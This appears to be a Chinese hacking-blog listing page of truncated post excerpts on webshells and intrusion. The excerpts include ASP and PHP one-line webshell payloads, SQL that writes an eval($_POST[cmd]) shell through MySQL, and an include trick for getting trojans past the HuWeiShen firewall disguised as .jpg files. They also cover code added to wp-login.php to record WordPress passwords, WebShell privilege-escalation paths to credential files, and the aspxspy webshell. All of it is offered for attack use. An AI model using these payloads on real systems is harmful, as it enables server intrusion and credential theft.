突破护卫神防火墙拦截传马

护卫神软件拦截传马是拦截你文件后缀名,但是不过滤jpg等一些常用文件的后缀! 所以可以用包含的方式 asp <!--#include file="../UpLoadFile/2011091711453973499.jpg" --> php <?php include "2.htm"; ?> 用这种方式的话!就不会被杀掉了! 细心就能发现原来如此! 现在在想法子突破不能添加到...

- 阅读全文 -

PHP Web 木马扫描器代码

scanner.php: <?php /**************PHP Web木马扫描器************************/ /* [+] 作者: alibaba */ /* [+] QQ: 1499281192 */ /* [+] MSN: weeming21@hotmail.com */ /* [+] 首发: t00ls.net , 转载请注明t00ls */ /* [...

- 阅读全文 -

号称“最全的WEBSHELL提权大大全

第一,WEBSHELL 权限提升技巧 C:\DocumentsandSettings\AllUsers\ApplicationData\Symantec\pcAnywhere\ 看能否跳转到这个目录,如果行那就最好了,直接下它的 CIF 文件,破解得到 pcAnywhere 密码,登陆 c:\ProgramFiles\serv-u\ C:\WINNT\system32\config\ 下它的 SA...

- 阅读全文 -

webshell一句话木马大全

  比较全的webshell一句话包括ASP,PHP,ASPX,JSP asp一句话木马程序代码 <%eval request("sb")%> 程序代码 <%execute request("sb")%> 程序代码 <%execute(request("sb"))%> 程序代码 <%execute request("sb")%><%'...

- 阅读全文 -

MySQL导出一句话拿WebShell的方法

文章中用到的SQL语句大体如下(命令行或者其它能执行SQL命令的shell都行): Drop TABLE IF EXISTS temp; //如果存在temp就删掉 Create TABLE temp(cmd text NOT NULL); //建立temp表,里面就一个cmd字段 Insert INTO temp (cmd) VALUES('<? php eval($_POST[cmd])...

- 阅读全文 -

加密一句话木马

我原也以为这是ASCII码加密过的 73,50,114,133,114,112,130,129,114,45,127,114,126,130,114,128,129,53,47,121,47,54,50,75结果T00LS某牛 全部数字减13,然后十进制解密  <script> var sun=[73,50,114,133,114,112,130,129,114,45,127...

- 阅读全文 -

webshell下记录WordPress登陆密码

webshell下记录Wordpress登陆密码方便进一步社工 原处:http://81sec.com/read.php?115 Wordpress的密码破解可以说基本是没招了,悲剧只好采用记录密码了。 在文件wp-login.php中539行处添加:     // log password $log_user=$_POST['log']; $log_pwd=$_POST['p...

- 阅读全文 -

aspxspy的大马的查看站点做限制

先介绍一下: 1.开发环境VS2008 + C#,兼容FrameWork1.1/2.0,基本实现代码分离,CSS方便参考了phpspy。 2.密码为32位MD5加密(小写) 默认为 admin. 3.全部采用POST方式提交数据,增强了隐蔽性。 4.增强了IIS探测功能,遍历IIS站点信息,绝对路径,多域名绑定,以及IIS账号密码。 5.增加了对指定文件的搜索功能。 6.修正了一些数据库操作的BU...

- 阅读全文 -